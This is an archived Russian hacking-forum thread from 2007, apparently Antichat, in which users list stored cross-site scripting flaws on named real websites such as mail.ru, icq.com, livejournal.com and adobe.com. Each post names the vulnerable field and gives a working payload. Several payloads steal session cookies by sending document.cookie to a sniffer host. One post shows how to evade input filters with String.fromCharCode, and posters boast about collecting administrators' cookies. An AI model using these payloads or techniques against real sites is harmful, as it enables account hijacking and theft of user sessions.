PDA

Просмотр полной версии : Активные Xss


Страницы : [1] 2

+toxa+
18.03.2007, 15:08
Тут постим тока активные XSS.

Так же сайт на котором вы нашли xss должен быть более или менее популярным:

1. Он не должен быть расположен на бесплатном хостинге.

2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще.

Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.

o3,14um
19.03.2007, 01:26
Сайт с хак-софтом, там и мой трой лежит))
samouchka.net - когда коммент добавляешь впиши.
<img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS]

freddi
19.03.2007, 13:16
www.jjurnal.ru

Довольно популярный жж.
Постим сообщение от анонимного пользователя.
Уязвимо поле "Имя:"
"><script>alert()</script>

Работает в опере и ие.

DimOnOID
19.03.2007, 14:25
email.ru

может и было..ибо XSS самая тупая))
..
отправляем письмо ..естестн в html....

<script>alert()</script>
или
<img src=javascript:alert()>

Isis
19.03.2007, 20:11
serials.softkiller.net
В теме любого кряка пишем камент с хсс
"><script>alert('xss')</script>

ice1k
19.03.2007, 21:29
proplay.ru

Идём в раздел "Команды":
--http://www.proplay.ru/team/
Там создаём новую команду.
Уязвимыми являются поля:
-Игры
-IRC канал
-Домашняя страница

Test:
--http://www.proplay.ru/team/744/

DimOnOID
20.03.2007, 23:56
sysadmin.mail.ru

Заходи на sysadmin.mail.ru.....
Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета*
в поле Крупный город: Выбираем любой город))
далее в поле Свой город/район: строчим "><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script>

и жмём Сохранить изменения...
после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин)) :)

Isis
26.03.2007, 11:49
www.qiq.ru
После регистрации, в профиле изменяем уязвимые поля, а именно:
1)Место жительства
2)О себе
А этих местах пишем
"><script>alert(/xss/)</script>

Пример (http://qiq.ru/users/279919.html)

Isis
28.03.2007, 09:52
ДОМ 3 ХЭК =))))))

dom3mir.ru

Регистрируемся с любыми данными......
Далее идем изменять свою анкету...
В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете
Москва" onmouseover="alert('xss')"

Далее идете в поиск...ищите себя понику и вот xss =)

n1†R0x
29.03.2007, 22:21
http://www.ohizba.ru/index.php?type=page&id=13
уязвимы все поля в гостевой книге
фуфло, но баг..
//updat3:
http://www.autolider.info/news/main.php?id=108&cpage=1
уязвимость в поле "name" в комментах ;)
извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты :)

запахало)

freddi
02.04.2007, 21:55
splashblog.com

Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:"

"><script>alert();</script>

Работает в ие и опере.

n1†R0x
03.04.2007, 18:18
http://rock-rus.com.ru/users.php

в регистрации пишем мыло blblbl@hek.cc"><script>alert('alert')</script>

freddi
04.04.2007, 22:07
icq.com

Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..."
<script>alert(1);</script>
Получилось голосование и теперь, когда кто-либо будет голосовать за пункт с алертом - то будут выскакивать все алерты (дапустим вы поставили алерты на все ансверы)))

Работает в ие и опере.

freddi
05.04.2007, 23:13
meta.ua

Идем в блог, создаем комментарий
<script>alert(10);</script>
и при ответе на этот коментарий вылезает алерт.

Работает в ие и опере.

freddi
05.04.2007, 23:22
comby.ru


Везде где можно оставить комментарий:
<img src=javascript:alert()>
вылезет алерт.

Работает в ие и опере.

o3,14um
06.04.2007, 15:49
http://planeta.solo.by/- геймерский сайт провайдера.

В личку написать:

<img src=fuck onerror=alert(\'xss\')

Horsekiller
07.04.2007, 11:01
tForum <= b0.915
Форум малораспространённый, но всё же.

Активная XSS в поле "Message".

http://www.target/path/message.php

Вставляем в поле "Message":

javascript:alert(document.cookie)

В кукисах сессия, логин.

Isis
08.04.2007, 11:36
Отморозки
http://www.otmorozki.org/images/login_d.gif
=============
Otmorozki.org
=============
Заходим в любую новость пишем комментарий...
Уязвимое поле "тема" ..вот там и пишем наш кодик..
"><script>alert("Отморозки вас похекале")</script>

Теперь ваша уязвимость ( xss ) будет гулять везде))Даже на главной странице

[loy]
08.04.2007, 11:39
жесть,зачод

Isis
08.04.2007, 11:51
Warcraft
http://games.mipt.ru/wc3/images/miptlogo.png
=============
Games.mipt.ru/wc3/
=============

Уязвимые поля при регистрации:
"Полное имя"
"О пользователе"
"Дом.страница"

Вставляем туда код "><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>

И вот пример.....просмотр моего профиля
Isis (http://games.mipt.ru/wc3/w3forum/index.cgi?uinfo=Isis)

+toxa+
08.04.2007, 13:27
buka.ru
в камментах к новостям
' любезно заменяются на "

freddi
08.04.2007, 15:12
warlog.info

Заходим в настройки сайта. Уязвимо поле "Название"

<script>alert();</script>

Теперь при просмотре статистики сайта на главной странице вылезает алерт.

Isis
11.04.2007, 13:20
Downloads.ru
http://downloads.ru/pics/www.gif
Выбираем любой файл....пишем к нему комментарий...
Все поля уязвимые т.е. мыло, ник и сообщение ...
"><script>alert("xss")</script>

Пример (http://downloads.ru/win/2600.hts#)

XTErner
13.04.2007, 00:24
ukrtelecom.ua
http://lib.kost.dn.ukrtelecom.ua/guestbook.php

freddi
13.04.2007, 21:48
liveinternet.ru

В дневниках.
1) Пишем личное сообщение. Уязвимо поле "Заголовок:"

"><script>alert();</script>

Если пользователь ответит на это сообщение, то велезет алерт.

2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:"

"><script>alert();</script>

n1†R0x
16.04.2007, 00:13
2 »Atom1c«

пост №16
http://forum.antichat.ru/showpost.php?p=328085&postcount=16

[dword]
18.04.2007, 23:39
zip-2002,
http://www.zip-2002.ru/forum/new.php?t=1&cat=3
В форме сообщения вводим: <script>alert();</script>

[dword]
19.04.2007, 00:40
Сайт: http://aktiv.kak-ya.ru/
Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments
Уязвимое поле: Заголовок

"><script>alert("hek \nActive_jaja")</script>


Сайт: http://forum.allsoch.ru/
Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076
Уязвимое поле: Ваш ответ.

"><script>alert()</script>

_GaLs_
22.04.2007, 14:26
http://www.booka.ru/

Вставить в поле Поиск

"><script>alert()</script>

http://www.oplachu.ru/tov226182.html

Вставить в поле Ваш комментарий

"><script>alert()</script>

http://catalog.kgbi.ru/
http://catalog.designatelie.ru

Вставить в поле Поиска

"><script>alert()</script>

[dword]
22.04.2007, 14:44
http://www.booka.ru/

Вставить в поле Поиск

Код:

"><script>alert()</script>

Gals, это же пассивная xss.

Сайт: http://www.photo-cult.com/
Путь: http://www.photo-cult.com/showpic.php?rate&id=187916
Уязвимое поле: Коментар


"><script>alert()</script>

DimOnOID
24.04.2007, 21:49
http://www.bilandima.ru бррр..противно...

Дневники>Новая Запись> Адрес фотографии >
http://"><script>alert(/xss/)</script>
да ещё там в куках..пасс в открытом виде)

freddi
24.04.2007, 22:15
rambler.ru

В «Планете» -> «Профиль» -> «Контакты»
Уязвимо поле “ICQ 2” и название аватарки.
Куки не стыришь, тк ограничение стоит 22 символа(((

<img src=javascript:alert()>

Horsekiller
25.04.2007, 06:45
http://kemclub.ru/


При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О -
<script>alert()</script>,

потом заходим http://kemclub.ru/club.php?p=8&srat=1
Находим себя, получаем алерт.

Horsekiller
26.04.2007, 09:11
http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )

При регистарации (http://ismart.ee/Books.dll/login?next=index)
уязвимы поля:
1. E-mail; - вписываем qwe@qwe.ru"><script>alert(/xss/)</script>
2. Ваше имя. - вписаваем
<script>alert(/xss/)</script>

Далее можно изменить приветствие на <script>alert(/xss/)</script>
, тоже работает.

Все заказы просматриваются вручную кстати ;)

И напоследок пассивная XSS, хотя это и не так интересно : http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C %2Fscript%3E

_GaLs_
27.04.2007, 22:48
Сайт http://www.cskabasket.com/


Постим коммент
<script>alert ();</script>

Morph
28.04.2007, 16:04
http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
Хек или не хек?

freddi
30.04.2007, 12:04
forum.xakep.ru

Запостил сюда тк не понял какой у них тип форума.
На форуме прицепляем файл тхт с содержанием:
"><script>alert()</script>
и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации.
на ие не тестил, он у меня глючит).

Goudini
01.05.2007, 13:56
на ачате слева ссылка $$$ для web-мастеров
http://tak.ru/editing.php
в любом поле нет фильтрации : "><script>alert()</script>

2pick
02.05.2007, 20:04
http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3Cscript%3Ealert('Here%20was%202pick');%3C/script%3E

mr.The
02.05.2007, 21:16
http://dyn.gismeteo.ru/cgi-bin/showmap.exe ?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3Cscript%3Ealert('Here%20was%202pick');%3C/script%3E
это пасивная

Horsekiller
04.05.2007, 08:10
http://emo.nnov.ru/

Очень популярный сайт эморей :D

Уязвимо поле E-mail:

qwe@qwe.com"><script>alert()</script>

mr.The
08.05.2007, 15:03
']Верховна Рада України
_http://portal.rada.gov.ua/control/uk/publish/category/news_left?from="><script>alert(document.cookie)</script>
это пасив кажись

в тему

уязвимое поле comments_http://martinlittle.com/guestbook/signguestbook.php

_http://www.beachhouse-hotel.com/signguestbook.php (пост можно увидеть на последней странице)

R0chez
09.05.2007, 11:38
http://www.booka.ru/
Вставить в поле Поиск
"><script>alert()</script>

или в томже поле</title><script>alert('xss')</script>
и от меня парочка багов )
http://www.hiidlane.ee/index.php?moodul=3&q="><script>alert(/xss/)</script>
http://www.turundusinfo.ee/?id=55&search="><script>alert('xss')</script>&search_src=all

freddi
09.05.2007, 12:01
Вы можете отличить пассивную от активной?

R0chez
09.05.2007, 12:11
Вы можете отличить пассивную от активной?
Нет. В чом разница ?

Hawkins
09.05.2007, 12:48
Для активной не нужно никаких действий со стороны пользователя.

mr.The
09.05.2007, 15:47
http://www.pfadi.ch/pal/tohuwabohu/guestbook/schreiben.php
уязвимы почти все поля

Luccifer
09.05.2007, 15:53
Тема нах..не нужная вот если бы вы выкладывали активные xss на таких почтовиках как :rambler.ru, yandex.ru или лучше всего mail.ru то это другое дело....а это все не иначе как МУСОР...не кому нах... не нужный=))))
Пустая трата времни.

freddi
09.05.2007, 15:57
Если ты такой умный сам там ищи.
К тому же ты наверно слепой, потому что на всех перечисленных тобой сайтах выкладывали уже хсс.

Luccifer
09.05.2007, 16:04
freddi
Но не все работают по сей день.Я именно про активные....

[53x]Shadow
12.05.2007, 00:38
Нет. В чом разница ?

Активная XSS (сохраненная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем, сохраненных в системе и доступных для вывода другим пользователям системы.

Т.е. в общем актив это когда уязвимость сохраняется в системе и выдается всем пользователем зашедшим на страницу с уязвимым параметром.

Пассивная XSS (переданная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.

Пассив в общем когда подсовывается ссылка пользователю, содержащая скрипт переданный в уязвимом параметре. Сработает один раз когда пользователь перейдет по специально сформированной ссылке, если же он перейдет на сайт по обычной ссылке, то ничего не произойдет.

Isis
20.05.2007, 05:08
Tak.ru
При регистрации уязвимы поля Login, ФИО, Email
Далее в настройках....
Уязвимы поля Название сайты, ссылка на него...
Так вот...
На этом сайте зарегистрированны 37к человек и размещают их рекламу на своем сайте....
И...в связи с этим...вы можете поломать множество сайтов...Как?
Очень просто.....
В панели управления, есть меню типа реклама..
Так вот там можно ставить разделитель рекламы....
Ставим "><script>alert(/xss/)</script>
И вот.....хсски на нашем сайте...
А почему я сказал что другие сайты можем поломать??
ПОтому что также здесь есть sql-inj, это вы найдете сами =)

Isis
20.05.2007, 05:15
ыыыы, какой красивый домен mydak.ru
http://www.mydak.ru/today.php
Думаю сами знаете что и куда вствлять...
на мои хек алерты не обращайте внимания =)

Horsekiller
20.05.2007, 09:21
http://dash.ru/
При регистрации указываем маил : your@mail.ru"><script>alert()</script>.
На мыло приходит ссылка для активации.
http://dash.ru/user/?menu=setup
При просмотре профиля или настроек вылезат алерт.

Isis
20.05.2007, 17:40
ll.oo.lv
Регистрация, изменение профиля....
Уязвимы все поля...
Активная xss при просмотре профиля http://ll.oo.lv/?do=prof&user=SnooPI
такой вот хек =)

DimOnOID
20.05.2007, 21:03
zgrk.com.ua

пишем в теле письма <img src='' onerror=alert(666)>

XenOtai
25.05.2007, 21:28
http://www.linux.org/user/register.html


Уязвимы поля First Name и Last Name.

Пример запроса: '><script>alert('Hacked%20by%20XenOtai')</script>

freddi
26.05.2007, 21:14
mail.ru yandex.ru rambler.ru

отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

на мейле прикрыли. куки норм приходят только на рамблер.

XenOtai
27.05.2007, 09:00
http://www.konami.com/edealinv/servlet/ExecMacro?nurl=control/Registration.vm&ctl_nbr=3810

Уязвимы многие поля, например Company Name и First Name.

Пример запроса: "><script>alert('Hacked%20by%20XenOtai')</script>

DimOnOID
29.05.2007, 23:19
travel.mail.ru

Наводим мышкой на рисунОК


http://travel.mail.ru/account_photos_popup.php?account_id=4163847

БуГагага..уже закрыли........10 часов жилаа...ххехехех))) ПРЕВЕД АДМИНАМ МАЙЛА... :p

l1ght
07.06.2007, 11:35
Хэк в индексе=) поле Адрес сайта
http://hackyou.ru/
описание тут (http://forum.antichat.ru/showthread.php?t=34117)

_Pantera_
12.06.2007, 23:47
www.web-hack.ru --> добавить новость

Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
<script>alert(document.cookie)</script>
и жмем кнопочку добавить (Аdd)

ps Как выяснилось, она является активной.

Isis
13.06.2007, 04:12
www.wikiupload.com
Заливаем любой файл...в описание пишем
'"><script>alert(/xss/)</script>
Кнопочку "upload" жмем...
Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
Идем в каменты и видим хсс
Пример
http://www.wikiupload.com/comment.php?id=158669

DimOnOID
13.06.2007, 19:58
chatcity.ru

Ну вообщем то........вроде чаты на chatcity


Поля:
E-mail
web-страничка

Вот один пример на volchat.ru
http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___

freddi
14.06.2007, 13:55
narod.yandex.ru

Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"

<script>alert('123');</script>

freddi
16.06.2007, 23:26
nm.ru

прикрепляем к письму файл txt или pdf со скриптом.

freddi
17.06.2007, 17:45
www.xyligan.ru

уязвимо поле "имя"))))

зы это из компании Хакера
ззы пассивных там полно.

freddi
17.06.2007, 21:34
www.xakep.ru

хсс в чате

уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде

"onmouseover="navigate('адрес_снифера'.concat(docume nt.cookie))"
или просто
"onmouseover="alert('xss')"

кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно

&#x6E;&#x61;&#x76;&#x69;&#x67;&#x61;&#x74;&#x65;

и пишем в виде

"onmouseover="String.fromCharCode(то что закодировали)"

ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)

зы спс DimOnOID за небольшую помощь)

V.I.P
28.06.2007, 19:39
www.panvasoft.com
Весьма популярный,посещаемый сайт.
потставляем "><script>alert()</script> во все поля в коментариях.

Пример:http://panvasoft.com/rus/11970/gb/


www.hpclub.ru
Добавление комментарий
"><script>alert()</script>

Пример:http://www.hpclub.ru/news.php3?cID=4

www.consultclub.biz

Добавление комментарий
"><script>alert()</script>[/B]

[53x]Shadow
29.06.2007, 16:30
www.lektravi.ru
Интернет магазин Лекарственные травы
Травки не желаете....=)
Активка в гостевой, при добавлении сообщения в поле почта пишем
'><script>alert("ShaDow");</script>
пример (http://www.lektravi.ru/e107_plugins/guestbook/guestbook.php)

V.I.P
06.07.2007, 22:46
www.internet.ru

Уязвимые поля: "Ваше имя";"Тема".
Добавление комментарий: <script>alert()</script>

Пример: http://www.internet.ru/news/2007-06-17409#comment-16117

Elvis000
23.07.2007, 11:05
англииская газетенка

http://www.accringtonobserver.co.uk/news/comments/form.html?story_id=230456

mister
27.07.2007, 00:04
nm.ru
http://www4.nm.ru/users/reg.dhtml?__post=1&login=asdasdasdasd&domain=<script>alert()</script>&passwd=asd&pass2=asd&quest_helper=&quest=&answ=
это пассивная xss.
чтобы сделать ее активной, пишем html-мессагу и подключаем xss через ифрейм.

Isis
02.08.2007, 03:37
http://www.hotfile.ru
Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
В данном случае
'"/><script>alert(/xss/)</script>
Получаем линк на скачивание, смотрим - активная хсс
Пример - http://www.hotfile.ru/52377/

http://meetfile.com
Зарегистрировались, заходим в профиль, изменяем его..
Уязвимы все поля...
'"/><script>alert(/xss/)</script>

freddi
09.08.2007, 19:12
dump.ru
уязвимо поле "Tags:" при заливке файла.

[53x]Shadow
20.08.2007, 01:09
Дневник на sestrenka.ru
Заводим дневник->постим сообщение в виде хтмл->собираем куки =)
пример (http://www.sestrenka.ru/dnevnik/beginer/)

l-l00K
27.08.2007, 16:48
http://www.fos.ru/
Заходим в гостевую книгу, нажимаем создать новое сообщение и пишем: '><script>alert('xss')</script> уязвимы все поля

l-l00K
29.08.2007, 17:08
http://provodka.ru/news.php?part=3&id=7545
Оставляем комментарий такого содержания:
"/><script>alert(/xss/)</script>
уязвимы оба поля

n3m0
30.08.2007, 13:58
1. Сервис загрузки файлов на сервер http://ifile.kiev.ua/
В поле "ОПИСАНИЕ" пишем

'"/><script>alert(/xss/)</script>


Пример http://ifile.kiev.ua/download_file/618/

2. Сервис загрузки файлов на сервер http://www.sendfiles.com.ua
После загрузки файла, в описании пишем

'><script>alert(/xss/)</script>


Пример http://www.sendfiles.com.ua/24431


UPD
тут же: При добавлении коментария, пишем в поле "Отзыв"

<script>alert(/xss/)</script>

l-l00K
02.09.2007, 17:08
http://www.skoda-russia.ru/resume.php
Оставляем комментарий такого вида:
"><font color=red onmouseover=javascript:alert('xss')>алерт работает!</font>

XenOtai
03.09.2007, 15:15
http://diary.ru/options/diary/?mydiary

Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс.

Пример запроса в поле:

"><script>alert(document.cookie)</script>

l-l00K
04.09.2007, 18:28
http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F
Оставляем комментарий такого вида:
"><script>alert('xss')</script>

XenOtai
04.09.2007, 22:27
livejournal.com

Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

Пример запроса:

<script>alert(document.cookie)</script>


Пример можно посмотреть здесь:

http://test-govno.livejournal.com/profile

PS. Не должны быть указаны страна и часовой пояс.

AdReNa1!Ne
14.09.2007, 21:07
http://robotraff.com/userpanel/selltraff.php
Уязвимы все поля

Результат - http://robotraff.com/userpanel/stats.php?thread=136

lsass.exe
14.09.2007, 21:34
http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0&cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29% 3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2 Fscript%3E&cat=0&x=0&y=0

http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

+StArT+
22.09.2007, 14:31
Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
.................................................. .......................
Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:"
при добавлении новости пользователем, и в личных сообщениях.
В поле "текст:" пишем следующие:
<img src="a"onError=javascript:alert('XSS');>Также, еще была найдена пассивная XSS
<a href="javascript:String.fromCharCode(60,115,99,114,105,1 12,116,62,97,108,101,114,116,40,100,111,99,117,109 ,101,110,116,46,99,111,111,107,105,101,41,60,47,11 5,99,114,105,112,116,62)">XSS</a>.................................................. .......................
______________________________________________
*****************************************

F1anKeR
25.09.2007, 13:37
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить

Scipio
25.09.2007, 13:47
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить

Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте

freddi
26.09.2007, 12:40
icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно

SSSetuPPP
21.10.2007, 04:35
icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно

Где находится это поле "Image web address:"?

SSSetuPPP
21.10.2007, 04:37
mail.ru yandex.ru rambler.ru

отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

на мейле прикрыли. куки норм приходят только на рамблер.

И на рамблере тоже не работает...:(

freddi
21.10.2007, 14:20
И на рамблере тоже не работает...:(
работает, в ие по крайней мере точно.

Где находится это поле "Image web address:"?
http://img30.picoodle.com/img/img30/6/10/21/f_1013m_424a366.jpg

SSSetuPPP
23.10.2007, 15:58
работает, в ие по крайней мере точно.

Слушай у меня не работает, может я чё не так делаю? Не мог бы ты пободробней объяснить?

BlackCats
25.10.2007, 23:13
cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:
http://www.cyberfight.ru/site/profile/108747
при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.

ЛифчиС5СВ
26.10.2007, 22:30
cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:

при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.
Добавлю, что там еще пассивная ХСС c куками. Уж0с

http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29% 3C%2Fscript%3E&Search.x=0&Search.y=0

BlackCats
26.10.2007, 23:12
пассивные я тоже находил, но эта тема называется активные xss ;)

BlackCats
27.10.2007, 17:12
http://livechat.boldchat.com/aid/6278237534205176796/bc.chat
active XSS в поле your name

Fugitif
27.10.2007, 17:18
Paradox Security Systems

http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20 BY%20Fugitif%22)%3C/script%3E



edit:



Blogus.ru

http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20 BY%20Fugitif%22)%3C/script%3E



edit:


Moto.ru


http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS %20BY%20Fugitif%22)%3C/script%3E

Dreel
29.10.2007, 05:27
Fugitif, и где там активность????
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
Иванов Иван <script>alert(/ xss /)</script>
Заходим на сайт _http://www.virtualflowers.ru/abook.php
Добавить адресата - в каментах
<script>alert(/ GraBBerZ.com /)</script>

freddi
29.10.2007, 14:50
mail.ru

в блогах пишем сообщение, там можно использовать разные теги, например имейдж

<img src="адрес_снифера">

так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее.


зы пользуясь случаем хочу передать привет админам мейла.

Серенький
31.10.2007, 02:05
netprint.ru

Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>

Укладываемся в 40 символов.

phol1eadeux
03.11.2007, 03:31
ЛЕНТА - сеть гипермаркетов
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>

ZAMUT
03.11.2007, 17:54
ЛЕНТА - сеть гипермаркетов
http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
Ошибся разделом, это пассивная

phol1eadeux
03.11.2007, 18:00
Разобрался

~!DoK_tOR!~
04.11.2007, 02:45
http://nsti.ru/guest/

Гостевая книга

Добавляем во все формы: "onmouseover="alert('xss')"

ZAMUT
04.11.2007, 21:46
www.miem.edu.ru
Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.
http://www.econ.msu.ru/
Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя
http://www.rapway.com.ru/
Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт
www.saletime.biz
Гостевая книга. Уязвимо поле: Имя
http://livemy.info
Регистрируемся, идем в раздел "События", уязвимое поле - описание события.
http://blog.inf.by
Регистрируемся, уязвимое поле: Название блога

Че-то пост разросся =)

ZAMUT
07.11.2007, 01:57
Верховная Рада Украины =)
http://portal.rada.gov.ua
Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)

Scipio
07.11.2007, 02:58
Adobe.com

регимся здесь

https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus

при регистрации вставляем в любое поле
<script>alert(12121)</script>

кроме e-mail, password, zip-code...

заходим в свой аккаунт и видим активную XSS...
Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф :)

ZAMUT
07.11.2007, 20:22
http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė

ZAMUT
08.11.2007, 22:53
www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
P.S. Сорри за 2ой пост =)

phol1eadeux
20.11.2007, 19:36
это в пассивные xss

it's my
27.11.2007, 10:17
www.fanat.com.ua
Украинские фанаты футбола

http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22

ZAMUT
27.11.2007, 10:40
www.fanat.com.ua
Украинские фанаты футбола

http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22

1. Это пассивная.
2. Сообщение в алерте нуждается в одинарных кавычках.

inlanger
27.11.2007, 20:50
это тоже пассивная. люди, читайте статьи и разбирайтесь что в какую тему писать

BlackCats
02.12.2007, 16:19
http://www.rabotnitsa.ru/guestbook.php
сайт журнала работница уязвимые поля емейл, автор

otmorozok428
04.12.2007, 15:52
Форум сертифицированных специалистов :)

http://www.certification.ru

В добавляемое сообщение вставляем:

<img src=javascript:q=new/**/Image;/**/q.src='http://www.mysite.ru/script.php'+'?c='+document.cookie>

И ждём, когда к нам в гости прилетят админские кукизы.

Fugitif
04.12.2007, 23:26
REDHAT

https://www.redhat.com/wapps/sso/rhn/login.html?redirect=%22%3E%3Cscript%3Ealert(%22XSS %20by%20Fugitif%22)%3C/script%3E


SWISS CARD

http://www.swisscard.ch/d/stellen/stellen_detail.php?oid=%22%3E%3Cscript%3Ealert(%22 XSS%20by%20Fugitif%22)%3C/script%3E


AND

PAYPAL SUCKS

http://www.paypalsucks.com/forums/showthread.php?fid=17&tid=6209&old_block=0&block=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


:p



EDIT:


here is wrong place...sorry ppl

NilsonUA
06.12.2007, 00:17
libra.kiev.ua/list_lyr.php?show_id=6578&page=1


в поле эмайл вводим '"><script>alert('Хss')</script>

BlackCats
06.12.2007, 11:10
http://playboy.com.ru/stat/se.php
активная ксс на официальном российском сайте суперпопулярного плейбоя
описание тут:
https://forum.antichat.ru/thread55136.html

Mike 007
06.12.2007, 21:26
http://www.babki.net/search.php
в поисковике товаров введите <script>alert('Mike 007 rulezz :D')</script>

BlackCats
07.12.2007, 00:52
http://www.oops.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала OOPS
описание тут:
https://forum.antichat.ru/thread55136.html

BlackCats
07.12.2007, 17:28
http://www.qr.ru/stat/se.php
активная xss на официальном российском сайте популярного журнала Quattroruote
описание тут:
https://forum.antichat.ru/thread55136.html

DimOnOID
26.12.2007, 10:07
Простенькая активка на My.mail.ru

Заходим в раздел *Желания* ->>Добавить желание...
Уязвимо поле *Метки* ...
Пример http://my.mail.ru/my/wishlist?wish=313616

:) С Новым Годом) :)

P.S Активка уже не работает....10 часов прожила) .ПРЕВЕД АДМИНАМ МАЙЛА..И ЛИЧНО ЗАКЕРУ.....Знаю ещё одну..но больше не надейтесь, что я тут выложу)

freddi
31.12.2007, 00:04
webfile.ru

загружаем картинку\пдф\тхт файлы со скриптом. скрипт выполняется при открытии файла.

~EviL~
10.01.2008, 02:49
Активная XSS на http://www.scandasia.com/

Уязвимость в комментариях к новостям в поле Your comment:

